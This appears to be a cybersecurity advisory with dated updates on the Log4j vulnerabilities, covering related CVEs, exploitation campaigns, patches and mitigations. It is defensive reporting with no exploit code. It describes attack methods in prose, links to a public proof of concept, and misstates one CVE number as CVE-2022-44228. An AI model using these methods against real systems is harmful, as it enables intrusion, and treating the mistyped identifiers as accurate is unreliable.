Summary
UPDATE, 15 March 2022
360Netlab recently released a blog indicating that their honeypot system
captured an unknown ELF file propagated through the Log4J vulnerability. This
ELF file triggered an alarm indicating a suspected DNS Tunnel. The analysis
determined that it is a new botnet family that analysts dubbed B1txor20 based on the file
name "b1t" used in its propagation, the XOR encryption algorithm, and
the 20-byte RC4 algorithm key length.
B1txor20 is a backdoor Trojan for the Linux platform that uses DNS Tunnel
technology to build a command-and-control (C2) channel. In addition to
traditional backdoor functionality, B1txor20 'also has functions such as
enabling Socket5 proxy, downloading and installing Rootkit remotely, and
rebounding Shell'. An affected device could be used as a jumping-off point for
further exploitation of the network.
UPDATE, 31 January
2022
Researchers recently published a blog detailing suspected active exploitation of
Unifi Network applications. The first observed successful exploitation was on
20 January 2022; a proof-of-concept (PoC) for this exploit was released on 24
December 2021.
These attacks are similar to those that the same researchers detailed targeting VMWare Horizon leveraging
the Log4j vulnerability, CVE-2022-44228.
However, researchers note that these attacks are unique in that the
command-and-control (C2) used was the same as was used in the SolarWind supply chain
attack , Cobalt beacon C2, and has been attributed to TA505 aka GRACEFUL
SPIDER, a well-known financially motivated threat group.
UPDATE, 28 December
2021
A fifth vulnerability related to Log4j has recently been disclosed. CVE-2021-44832 is an RCE vulnerability
with a moderate severity rating (CVSS:
6.6) and is due to the lack of additional controls on JDNI
access in Log4j. This vulnerability affects all versions from 2.0-alpha7 to
2.17.0, excluding 2.3.2 and 2.12.4.
Apache has released version 2.17.1 to remediate. Users are encouraged to
update this latest version after appropriate testing is completed.
UPDATE, 27 December
2021
CISA, along with other security organizations, recently released scanners to
identify Log4j vulnerabilities. The open-source tool is derived from scanners
created by other members of the security community and is designed to help
organizations determine if they have vulnerable web services affected by the
critical Log4j vulnerabilities. This scanner is located on CISA's public Github
repository , and scans for two major Log4j vulnerabilities, tracked as
CVE-2021-44228 and CVE-2021-45046. CISA stated that this scanner supports DNS
callback for vulnerability discovery and validation as well.
UPDATE, 22 December
2021
Today the CISA, FBI, NSA, Australian Cyber Security Centre (ACSC), Canadian
Centre for Cyber Security (CCCS), the Computer Emergency Response Team New
Zealand (CERT NZ), the New Zealand National Cyber Security Centre (NZ NCSC),
and the United Kingdom’s National Cyber Security Centre (NCSC-UK) released a
joint alert to provide additional guidance in
mitigating vulnerabilities pertaining to Apache’s Log4j software library.
This alert expands on previously published guidance by "detailing steps
that vendors and organizations with IT and/or cloud assets should take to
reduce the risk posed by these vulnerabilities."
These steps include:
- Identifying assets affected by Log4Shell and other
Log4j-related vulnerabilities
- Upgrading Log4j assets and affected products to the
latest version as soon as patches are available and remaining alert to
vendor software updates
- Initiating hunt and incident response procedures to
detect possible Log4Shell exploitation.
This alert also provides additional guidance for affected organizations with
operational technology (OT)/industrial control systems (ICS) assets.
UPDATE, 21 December
2021
It has been recently discovered that the Log4j vulnerability is
now being exploited to infect Windows devices with the Dridex banking Trojan
and Linux devices with Meterpreter.
Researchers state that threat actors use the Log4j RMI (Remote Method
Invocation) exploit variant to force vulnerable devices to load and execute a
Java class from an attacker-controlled remote server. Successful execution
allows installation of the Dridex Trojan or Meterpreter once the targeted device
is identified as running Windows or Linux.
Dridex is known for targeting online banking users to steal their
credentials. More recent variants of Dridex have additional capabilities such
as conducting surveillance activities, uploading additional malware, and
propagating to other devices.
Successful deployment of either Dridex or Meterpreter could allow attackers
to deploy further payloads or remotely execute commands on an affected device.
UPDATE, 20 December
2021
Another vulnerability in Log4j has been identified. CVE-2021-45105 , rated as high
severity (CVSS: 7.5),
could allow an attacker with control over Thread Context Map data to cause a
DoS condition.
While not exploiting the same vulnerability as the initial Log4j
vulnerability, CVE-2021-45105 uses Context Map lookups rather than the JNDI
lookups to an LDAP server that allows attackers to execute any code that’s
returned in the Log4Shell vulnerability. This vulnerability affects all
versions of the tool from 2.0-beta9 to 2.16, but only appears to affect
non-default configurations.
Apache released its newest update, 2.17.0 , to mitigate the newest
vulnerabilities.
UPDATE, 17 December
2021
New details regarding Log4j continue to emerge.
Two additional vulnerabilities addressing Log4j have been observed and
detailed. As of the time of this writing, there are four vulnerabilities
associated with Log4j (also known as LogJam and Log4Shell):
- CVE-2021-44228 is the original
Log4j vulnerability, rated as critical (CVSS: 10.0)
- CVE-2021-45046 is a Denial of
Service (DoS) vulnerability. Previously considered a low severity
vulnerability (CVSS: 3.7), CVE-2021-45046 has been recently updated as
critical (CVSS:
9.0)
- CVE-2021-4104 affects the
non-default configurations of Log4j 1.x instances and is considered a high
severity vulnerability (CVSS:
8.1)
- CVE-2021-42550 is a vulnerability
in the Logback logging framework, a successor to the Log4j 1.x library and
is rated as medium severity (CVSS:
6.6)
Researchers strongly recommend updating to version 2.16.0, and organizations
are urged to continue to monitor Apache's Log4j advisory page for updates.
In addition, CISA today issued an emergency directive directing
federal civilian executive branch (FCEB) agencies to address Log4j
vulnerabilities.
While the CISA Emergency Directive applies directly to federal civilian
executive branch agencies, it does demonstrate the level of attention CISA is
placing on these vulnerabilities and their recommended mitigating actions. For
additional details, see CISA’s webpage Apache Log4j
Vulnerability Guidance .
New studies also show that attackers - from cybercriminals,
including newly identified Conti ransomware actors targeting
VMWare servers, to nation-state actors - have attempted to exploit log4j
vulnerabilities on almost half of global networks.
UPDATE, 15 December
2021
A second vulnerability in Log4j was recently discovered. Tracked as CVE-2021-45046 with a CVSS score of
3.7, this vulnerability affects all versions of Log4j through version 2.15.0.
Apache has released version 2.16.0 in response; it is
now recommended organizations apply the latest patch version 2.16.0, as version
2.15.0 was deemed incomplete. Apache stated in this latest advisory that the
incomplete patch for CVE-2021-44228 could be abused to "craft malicious
input data using a JNDI Lookup pattern resulting in a denial-of-service (DoS)
attack."
UPDATE, 14 December
2021
CISA states that they, along with partners, are tracking and responding to
the active, widespread exploitation of this critical RCE vulnerability, thought
to potentially affect millions of organizations and hundreds of millions of
devices across a variety of enterprises and industries.
As a result, CISA created a website devoted to guidance related to the
Log4j vulnerability. This website will be actively maintained with a
community-sourced GitHub repository of publicly available
information and vendor-supplied advisories.
Of note, Log4j is now being viewed as 'fully weaponized' and being actively
exploited by what at least two security firms suggest are Chinese government
hacking groups.
UPDATE, 13 December
2021
Additional details continue to roll in on the critical zero-day
vulnerability affecting several versions of Apache’s Log4j, CVE-2021-44228.
Over the weekend, researchers published a blog detailing their observations on how
attackers are attempting to exploit this vulnerability, including variations in
attack methods and obfuscation methods in attempts to hide within ‘normal’
network traffic.
Additional research shows that CVE-2021-44228 is being
leveraged to form new botnets. Two have been identified – a Muhstik botnet and
a Mirai botnet – both being used to target Linux devices.
In addition, coin miners are now attempting to exploit this vulnerability
for their purposes.
In fact, mass scanning attempts aiming to deploy coin miners or malware for
building botnets have been observed. This could be considered 'sophisticated
activity,' potentially from an advanced persistent threat (APT) actor or a
state-sponsored actor.
Again, Apache has released Log4j version 2.15 which contains a fix for this
CVE. It is recommended to immediately upgrade to this version once appropriate testing
has been completed in your environment.
Researchers recommend that, if your organization is unable to apply the
patches, you can mitigate this vulnerability as follows:
- For versions 2.0 and before 2.10, Apache recommends
removing the Jndi Lookup class from the classpath by running:
zip -q -d
log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
- For versions 2.10 and above, set the system property formatMsgNoLookups
to true
or set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS
to true.
- If you cannot do any of the above, you can block all
outbound LDAP or RMI connections using Application Identity filters.
Juniper SRX NG Firewall provides AppID signatures for both protocols.
Some researchers also recommend web application firewalls (WAF) - though
these are not considered foolproof - as well as outbound egress filtering and
allow listing.
Indicators of Compromised (IoCs) and additional mitigation recommendations
are available at the research sites mentioned above. In addition, further
details regarding known vulnerable software are availble here , and details regarding exploitation
detection are available here .
Original Content
Apache recently released a security advisory to address a
vulnerability in its Log4j Java library, an open source logging utility that's
used in countless apps, including those used by large enterprise organizations
and cloud services.
A remote code execution (RCE) vulnerability that does not require
authentication, CVE-2021-44228 , dubbed Log4Shell or
LogJam, affects Log4j versions 2.0-beta9 to 2.14.1. This vulnerability is
considered critical and has been assigned a CVSS score of 10.0.
A remote attacker could exploit this vulnerability to take control of an
affected system.
Researchers initially reported this vulnerability to Apache on
November 24, indicating that CVE-2021-44228 also impacts default configurations
of multiple Apache frameworks, including Apache Struts2, Apache Solr, Apache
Druid, Apache Flink, and others.
A proof-of-concept (PoC) exploit was published on GitHub yesterday; threat
actors immediately began scanning the internet for vulnerable hosts and
networks.
Along with Apache and the US CISA, New Zealand Computer Emergency Response
Team (CERT NZ) issued a security advisory warning of
active exploitation in the wild.
Further, other researchers believe that "Similarly to other
high-profile vulnerabilities such as Heartbleed and Shellshock, we believe
there will be an increasing number of vulnerable products discovered in the
weeks to come."
It is likely that many threat actors, to include ransomware actors, will
begin leveraging this vulnerability immediately.
Analysis
Affected Versions
This vulnerability impacts Log4j versions 2.0-beta9 to 2.14.1, as well as
default configurations of multiple Apache frameworks, including Apache Struts2,
Apache Solr, Apache Druid, and Apache Flink.
Potential Impact
Successful exploitation of this vulnerability could allow complete system
takeover on vulnerable systems.
Recommendations
Apache released an update to address this vulnerability.
CISA encourages users and administrators to review the Apache Log4j 2.15.0
Announcement and upgrade to Log4j 2.15.0 or apply the recommended
mitigations immediately.
Recommends clients update to the most recent version after appropriate
evaluation and testing have been completed.
References
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://logging.apache.org/log4j/2.x/security.html
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/
https://protect-eu.mimecast.com/s/7LIkCWnxXIDKZWo5HxkFaf?domain=mail-archives.us.apache.org
https://github.com/tangxiaofeng7/apache-log4j-poc
https://blogs.juniper.net/en-us/enterprise-cloud-and-transformation/apache-log4j-vulnerability-cve-2021-44228-raises-widespread-concerns
https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/
https://isc.sans.edu/forums/diary/Log4Shell+exploited+to+implant+coin+miners/28124/
https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
https://github.com/NCSC-NL/log4shell/tree/main/software
https://www.govinfosecurity.com/serious-log4j-security-flaw-race-underway-to-discern-scope-a-18107
https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
https://github.com/cisagov/log4j-affected-db
https://nvd.nist.gov/vuln/detail/CVE-2021-45046
https://www.zdnet.com/article/log4j-flaw-nearly-half-of-corporate-networks-have-been-targeted-by-attackers-trying-to-use-this-vulnerability/#ftag=RSSbaffb68
https://nvd.nist.gov/vuln/detail/CVE-2021-42550
https://nvd.nist.gov/vuln/detail/CVE-2021-4104
https://www.cisa.gov/emergency-directive-22-02
https://www.bleepingcomputer.com/news/security/conti-ransomware-uses-log4j-bug-to-hack-vmware-vcenter-servers/
https://nvd.nist.gov/vuln/detail/CVE-2021-45105
https://logging.apache.org/log4j/2.x/download.html
https://heimdalsecurity.com/blog/dridex-malware-installed-with-the-help-of-log4j-vulnerability/
https://www.cisa.gov/uscert/ncas/alerts/aa21-356a
https://github.com/cisagov/log4j-scanner
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832
https://blog.morphisec.com/log4j-exploit-targets-vulnerable-unifi-network-applications
https://blog.morphisec.com/log4j-exploit-hits-again-vulnerable-vmware-horizon-servers-at-risk
https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/
https://blog.netlab.360.com/b1txor20-use-of-dns-tunneling_cn/
